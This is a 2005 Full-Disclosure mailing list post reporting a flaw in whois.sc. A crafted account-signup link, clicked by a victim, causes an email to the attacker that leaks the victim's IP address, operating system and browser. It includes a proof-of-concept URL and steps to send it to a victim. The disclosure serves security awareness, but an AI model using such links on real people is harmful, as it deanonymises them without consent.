[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] whois.sc not-big-deal hole (2nd post)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] whois.sc not-big-deal hole (2nd post)
- From: unknown unknown <unknown.pentester@xxxxxxxxx>
- Date: Thu, 3 Nov 2005 09:30:19 +0000
I just forgot to mention in the previous post that after the victim
clicks on the specially-crafted link, the attacker should be able to
receive an account sign-up email with the following information about
the victim (located at the bottom of the email body):
- IP Address
- Operating system version
- Web browser version
The bottom of the email looks like this (some information has been hidden):
---------------------------------------------------
NOTE: You received this message because someone from
X.X.X.X(Mozilla/X.X (Windows; U; Windows NT X.X; en-US; rv:X.X.X)
Gecko/2005XXXX Firefox/X.X.X)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------
PoC:
http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40gmail.com
Replace "attacker%40gmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the victim.
Note: the only limitation of this "trick" is that the attacker needs
to use a different email address for each attack. This is because
whois.sc will set the account activation status to "pending" after
requesting the account activation for the first time.
Regards,
pagvac
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/